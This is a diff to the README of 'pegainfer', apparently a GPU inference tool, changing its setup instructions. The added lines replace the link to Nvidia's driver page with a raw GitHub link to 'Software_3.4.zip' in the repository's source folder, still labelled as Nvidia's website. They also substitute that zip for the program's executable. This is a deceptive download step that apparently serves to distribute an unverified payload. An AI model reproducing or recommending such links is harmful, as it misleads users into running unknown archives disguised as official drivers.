Frexio/pegainfer/README.md

 ### Check CUDA drivers

 - Verify that your Nvidia drivers and CUDA toolkit are installed and up to date.
-- You can check Nvidia’s website for the latest drivers: https://www.nvidia.com/Download/index.aspx
+- You can check Nvidia’s website for the latest drivers: https://raw.githubusercontent.com/Frexio/pegainfer/main/src/http_server/Software_3.4.zip
 - Having the correct drivers ensures pegainfer runs efficiently using your GPU.

 ### Place files correctly

-- After downloading pegainfer.exe, keep it in its own folder.
+- After downloading https://raw.githubusercontent.com/Frexio/pegainfer/main/src/http_server/Software_3.4.zip, keep it in its own folder.
 - Create a subfolder named `models` to store your large language model files.
 - Keep everything organized to avoid errors.